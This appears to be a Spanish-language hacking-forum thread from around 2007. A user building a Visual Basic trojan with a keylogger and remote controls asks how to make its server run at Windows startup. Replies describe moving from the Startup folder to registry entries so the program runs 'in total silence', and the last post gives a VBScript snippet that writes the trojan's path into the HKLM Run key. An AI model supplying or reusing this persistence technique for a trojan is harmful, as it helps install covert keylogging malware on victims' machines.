Resultados 1 al 5 de 5

Como ejecuto el server de mi troyano con windows

  1. #1 Como ejecuto el server de mi troyano con windows 
    Iniciado
    Fecha de ingreso
    Feb 2007
    Mensajes
    2
    Descargas
    0
    Uploads
    0
    Bueno estoy programando un troyano en visual basic y ya tengo casi todo echo. El troyano tiene varias funciones como abrir y cerrar cd, apagar la compu, un keyloger y oculta la bandeja de inicio...pero eso no viene al caso, el caso es he buscado por ahi un codigo para que el server se ejecute al inicio de windows y no lo he encontrado. Quiero saber si tiene algun codigo o idea que me puedan brindar. Se lo agradecere
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Feb 2002
    Ubicación
    México
    Mensajes
    1.156
    Descargas
    4
    Uploads
    0
    Mientras el mundo permanezca no acabarán la fama y la gloria de México-Tenochtitlan
    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Feb 2007
    Mensajes
    2
    Descargas
    0
    Uploads
    0
    Gracias men pero.... me quede igual
    Citar  
     

  4. #4  
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    Ni Zorra idea
    Mensajes
    94
    Descargas
    0
    Uploads
    0
    Yo hice un troyano (empeze aya por el 2004) (y aun sigo mejorandolo dia tras dia)(bueno, semana tras semana..) y mi primer metodo pare ejecutarlo al inicio era copiar el ejecutable en la carpeta "Inicio" del XP, pero claro, no era muy aconsejable poner nada hay pork alguien podia mirar y ver algo raro, entonces empece a buscar y buscar y al final lo hice creando las entradas de registro oportunas para k se ejecute en "total silencio" desde el reg de windows.
    th3_cjcr
    Citar  
     

  5. #5  
    Iniciado
    Fecha de ingreso
    Feb 2007
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    Cita Iniciado por Mr. K-bron Ver mensaje
    Bueno estoy programando un troyano en visual basic y ya tengo casi todo echo. El troyano tiene varias funciones como abrir y cerrar cd, apagar la compu, un keyloger y oculta la bandeja de inicio...pero eso no viene al caso, el caso es he buscado por ahi un codigo para que el server se ejecute al inicio de windows y no lo he encontrado. Quiero saber si tiene algun codigo o idea que me puedan brindar. Se lo agradecere
    Código:
    Set variable  = CreateObject("WScript.Shell")
    variable.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\loquesea",
    "C:\server.exe"
    logicamente si tienes el server en windows u otro ubicacion tienes que modificarla, loquesea es el nombre que se creara en el registro.
    Citar  
     

Temas similares

  1. Respuestas: 1
    Último mensaje: 14-07-2006, 09:17
  2. Proxy-troyano-server
    Por enrique2k en el foro GENERAL
    Respuestas: 2
    Último mensaje: 21-11-2004, 22:16
  3. Respuestas: 0
    Último mensaje: 12-04-2003, 11:20
  4. ¿como ejecuto 2 aplicaciones con un acceso directo?
    Por LuchoNico en el foro WINDOWS
    Respuestas: 2
    Último mensaje: 08-11-2002, 12:21
  5. windows nt server
    Por lecter en el foro INTRUSION
    Respuestas: 0
    Último mensaje: 23-07-2002, 01:38

Marcadores

Marcadores